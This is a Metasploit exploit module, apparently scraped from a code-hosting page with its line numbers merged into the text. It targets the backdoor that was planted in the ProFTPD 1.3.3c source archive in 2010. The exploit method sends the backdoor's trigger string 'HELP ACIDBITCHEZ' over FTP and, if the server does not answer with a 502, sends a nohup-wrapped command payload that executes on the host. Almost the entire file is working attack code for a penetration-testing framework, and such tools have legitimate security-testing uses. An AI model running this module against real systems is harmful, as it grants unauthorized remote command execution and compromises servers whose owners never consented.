Path: blob/master/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
23771 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Ftp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'ProFTPD-1.3.3c Backdoor Command Execution',15'Description' => %q{16This module exploits a malicious backdoor that was added to the17ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]18archive between November 28th 2010 and 2nd December 2010.19},20'Author' => [ 'MC', 'darkharper2' ],21'License' => MSF_LICENSE,22'References' => [23[ 'CVE', '2010-20103' ],24[ 'OSVDB', '69562'],25[ 'BID', '45150' ]26],27'Privileged' => true,28'Platform' => [ 'unix' ],29'Arch' => ARCH_CMD,30'Payload' => {31'Space' => 2000,32'BadChars' => '',33'DisableNops' => true,34'Compat' =>35{36'PayloadType' => 'cmd',37'RequiredCmd' => 'generic perl telnet',38}39},40'Targets' => [41[ 'Automatic', {} ],42],43'DisclosureDate' => '2010-12-02',44'DefaultTarget' => 0,45'Notes' => {46'Reliability' => UNKNOWN_RELIABILITY,47'Stability' => UNKNOWN_STABILITY,48'SideEffects' => UNKNOWN_SIDE_EFFECTS49}50)51)5253deregister_options('FTPUSER', 'FTPPASS')54end5556def exploit57connect5859print_status("Sending Backdoor Command")60sock.put("HELP ACIDBITCHEZ\r\n")6162res = sock.get_once(-1, 10)6364if (res and res =~ /502/)65print_error("Not backdoored")66else67sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")68handler69end7071disconnect72end73end747576